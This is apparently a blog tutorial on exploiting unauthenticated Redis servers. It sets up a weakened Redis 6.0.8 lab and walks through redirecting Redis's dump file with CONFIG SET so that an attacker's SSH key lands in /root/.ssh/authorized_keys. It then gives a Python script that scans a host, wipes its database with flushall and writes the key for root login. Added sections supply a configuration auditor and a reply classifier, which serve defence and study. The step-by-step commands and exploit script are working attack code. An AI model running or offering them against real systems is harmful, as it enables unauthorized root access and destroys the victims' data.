Writing Redis vulnerability detection and exploitation scripts in Python

Environment setup

# wget http://download.redis.io/releases/redis-6.0.8.tar.gz
# tar xzf redis-6.0.8.tar.gz
# cd redis-6.0.8
# make

After make finishes, the compiled server binary redis-server and the client program redis-cli (used here for testing) appear in the src directory of redis-6.0.8:

Start the Redis server:

# cd src
# ./redis-server

Edit redis.conf: comment out the bind 127.0.0.1 line so the server listens on all interfaces and accepts remote connections, and set protected-mode no. Both changes are needed: since Redis 3.2, protected mode refuses commands from non-loopback clients whenever no explicit bind address and no password are configured, so an instance with only the bind line removed would still answer remote clients with a DENIED error.


Start the server with the modified configuration file:

# cd src
# ./redis-server ../redis.conf

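The two configuration states this section contrasts, as an added example that is not part of the original post: a small Python audit that parses redis.conf text and reports the settings that make the SSH-key write described below possible. The WEAK_CONF and HARDENED_CONF strings are constructed samples; requirepass and rename-command are the standard redis.conf directives for adding a password and disabling a command, and the audit goes slightly beyond the post by checking for those two in addition to bind and protected-mode.

```python
# Constructed sample: the lab configuration this post uses (bind commented out, no auth).
WEAK_CONF = """\
# bind 127.0.0.1
protected-mode no
port 6379
dir ./
"""

# Constructed sample: the same file with the settings a production host should carry.
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
requirepass use-a-long-random-secret-here
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

LOOPBACK = {'127.0.0.1', '::1', 'localhost'}


def parse_conf(text):
    """Return {directive: [values...]} for the active (non-comment) lines of a redis.conf."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ''
        conf.setdefault(key, []).append(value)
    return conf


def listens_on_loopback_only(conf):
    """True when every configured bind address is loopback. No bind line means all interfaces."""
    values = conf.get('bind', [])
    if not values:
        return False
    for value in values:
        for addr in value.split():
            # a leading '-' is the Redis 7 "optional address" prefix; ignore it
            if addr.lstrip('-') not in LOOPBACK:
                return False
    return True


def disabled_commands(conf):
    """Commands renamed to the empty string can no longer be called by any client."""
    disabled = set()
    for value in conf.get('rename-command', []):
        parts = value.split(None, 1)
        if len(parts) == 2 and parts[1].strip() in ('""', "''"):
            disabled.add(parts[0].upper())
    return disabled


def audit(text):
    """Return the list of weaknesses that together allow CONFIG SET dir/dbfilename + SAVE."""
    conf = parse_conf(text)
    findings = []
    if not listens_on_loopback_only(conf):
        findings.append('bind: instance reachable from non-loopback addresses')
    # protected-mode defaults to yes when the directive is absent (Redis >= 3.2)
    if conf.get('protected-mode', ['yes'])[-1].lower() == 'no':
        findings.append('protected-mode no: unauthenticated remote clients are served')
    if 'requirepass' not in conf:
        findings.append('requirepass unset: any client can run every command')
    if 'CONFIG' not in disabled_commands(conf):
        findings.append('CONFIG enabled: dir and dbfilename can be redirected at runtime')
    return findings


if __name__ == '__main__':
    for name, text in (('weak', WEAK_CONF), ('hardened', HARDENED_CONF)):
        print(name, audit(text))
```

Run audit(open('redis.conf').read()) against a real file. On Redis 6 and later an ACL rule that removes CONFIG from the default user does the same job as rename-command, and note that protected-mode no is only tolerable when a password or a loopback-only bind is in place.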

Exploitation

The idea is to point the dump directory at /root/.ssh and the dump file name at authorized_keys, store the attacker's public key as a value, and trigger a save. Redis then writes its RDB dump to /root/.ssh/authorized_keys on the server. The dump is mostly binary, but sshd parses authorized_keys line by line and ignores lines it cannot read, so as long as the key sits on a line of its own it becomes an authorized key for root. This only works when redis-server runs as root (as it does in this lab), /root/.ssh already exists on the target (CONFIG SET dir fails otherwise), and sshd permits public-key logins for root.

1. Generate a key pair on the local host

ssh-keygen -t rsa


2. In /root/.ssh, check the generated files and write the public key into a text file with blank lines before and after it. The padding makes sure the key ends up on a line of its own inside the RDB dump, separated from the binary bytes Redis writes around the value:

cd /root/.ssh
ls
(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n") > key.txt
cat key.txt


3. Load the public key into Redis. The -x option makes redis-cli read the last argument (the value) from stdin, so the whole padded file becomes the value of the key crackit (the same key name the script below uses):

cat /root/.ssh/key.txt | redis-cli -h xx.xx.xx.xx -x set crackit

4. Connect to the target host, change the dump directory to /root/.ssh, set the dump file name to authorized_keys, and save:

redis-cli -h xx.xx.xx.xx

config set dir /root/.ssh
config set dbfilename authorized_keys
save

5. SSH into the target host as root, using the private key generated in step 1:

ssh root@xx.xx.xx.xx

Writing the Python script

GitHub: https://github.com/sp4zcmd/SimpleRedisScanner

#!/usr/bin/env python3
# Usage: python RedisScanner.py <ip> <key.txt>   (needs: pip install redis)
import socket
import sys

import redis


def Usage():
    print('RedisScanner.py 127.0.0.1 key.txt')


def Scan(ip):
    # RESP encoding of the INFO command: *1\r\n$4\r\ninfo\r\n
    payload = "\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    try:
        s.connect((ip, 6379))
        s.sendall(payload.encode())
        recvdata = s.recv(1024).decode(errors='replace')
        # An unauthenticated instance returns the INFO text; with protected mode or
        # requirepass in place the reply is an error line (-DENIED / -NOAUTH) instead.
        if 'redis_version' in recvdata:
            print('[+] %s is vulnerable ' % ip)
            #print(recvdata)
            return True
        print('[-] %s is not vulnerable (reply: %s)' % (ip, recvdata.strip()[:60]))
        return False
    except OSError as e:
        print('[-] %s is not vulnerable (%s)' % (ip, e))
        return False
    finally:
        s.close()


def WriteSSHKeygen(ip, sshkey):
    try:
        r = redis.StrictRedis(host=ip, port=6379, db=0, socket_timeout=2)
        r.flushall()                                   # empty the DB so the dump holds little else
        r.set('crackit', sshkey)                       # the padded public key is the value
        r.config_set('dir', '/root/.ssh/')             # fails unless the directory exists on the target
        r.config_set('dbfilename', 'authorized_keys')
        r.save()                                       # writes /root/.ssh/authorized_keys
        print('[+] Write SSHkeygen successful')
    except redis.RedisError as e:
        print('[-] Write SSHkeygen Failed: %s' % e)


if __name__ == '__main__':
    if len(sys.argv) == 3:
        ip = sys.argv[1]
        sshkeyfile = sys.argv[2]
        try:
            with open(sshkeyfile, 'r') as f:
                sshkey = f.read()
        except OSError as e:
            # the original fell through here with sshkey undefined; stop instead
            print('Read SSHkeygen Failed: %s' % e)
            sys.exit(1)

        if Scan(ip):
            WriteSSHKeygen(ip, sshkey)
    else:
        Usage()
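The hex payload in Scan() is the RESP encoding of INFO. As an added example, not code from the post or from the SimpleRedisScanner repository, the following encodes arbitrary commands into RESP and classifies the first reply, distinguishing an open instance from one that answers -DENIED (protected mode) or -NOAUTH (requirepass set), which the script above lumps together as "not vulnerable". The sample replies are constructed, the DENIED message is shortened from the real one, and probe() is the only part that talks to a real host.

```python
import re
import socket


def resp_command(*args):
    """Encode a command as a RESP array of bulk strings, the format redis-cli speaks.
    resp_command('info') is exactly the hex payload used by Scan() in the script."""
    out = b'*%d\r\n' % len(args)
    for arg in args:
        if isinstance(arg, str):
            arg = arg.encode()
        out += b'$%d\r\n%s\r\n' % (len(arg), arg)
    return out


def classify(reply):
    """Sort the first reply to INFO into: open, protected, auth, not-redis, unknown."""
    if not reply.startswith((b'+', b'-', b':', b'$', b'*')):
        return 'not-redis'          # no RESP type byte: something else is on the port
    if reply.startswith(b'-DENIED'):
        return 'protected'          # protected-mode yes and client not on loopback
    if reply.startswith(b'-NOAUTH'):
        return 'auth'               # requirepass is set; AUTH needed first
    if reply.startswith(b'$') and b'redis_version:' in reply:
        return 'open'               # INFO served without authentication
    return 'unknown'


def redis_version(reply):
    """Pull the redis_version field out of an INFO reply, or None if absent."""
    m = re.search(rb'redis_version:([^\r\n]+)', reply)
    return m.group(1).decode() if m else None


def probe(ip, port=6379, timeout=5):
    """Send INFO to a live host and return (classification, version)."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.sendall(resp_command('info'))
        reply = s.recv(4096)
    return classify(reply), redis_version(reply)


# Constructed sample replies (not captured from a real host); the bulk-string
# length prefix of OPEN_REPLY is computed so the framing is valid RESP.
_info_body = (b'# Server\r\nredis_version:6.0.8\r\nredis_mode:standalone\r\n'
              b'os:Linux 5.4.0 x86_64\r\n')
OPEN_REPLY = b'$%d\r\n%s\r\n' % (len(_info_body), _info_body)
DENIED_REPLY = (b'-DENIED Redis is running in protected mode because protected mode is '
                b'enabled and no bind address was specified (message shortened)\r\n')
NOAUTH_REPLY = b'-NOAUTH Authentication required.\r\n'
HTTP_REPLY = b'HTTP/1.1 400 Bad Request\r\n'

if __name__ == '__main__':
    print(resp_command('config', 'set', 'dir', '/root/.ssh'))
    for r in (OPEN_REPLY, DENIED_REPLY, NOAUTH_REPLY, HTTP_REPLY):
        print(classify(r), redis_version(r))
```

The distinction matters for triage: a protected or auth result means the host is exposed but not exploitable as-is, while an open result with a version string is the case the rest of the script acts on.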

Test run

Running the script against the lab instance reports the key write as successful, and an SSH connection to the target then succeeds.


Unless otherwise stated, all posts on this blog are licensed under CC BY-SA 4.0; please credit the source when republishing.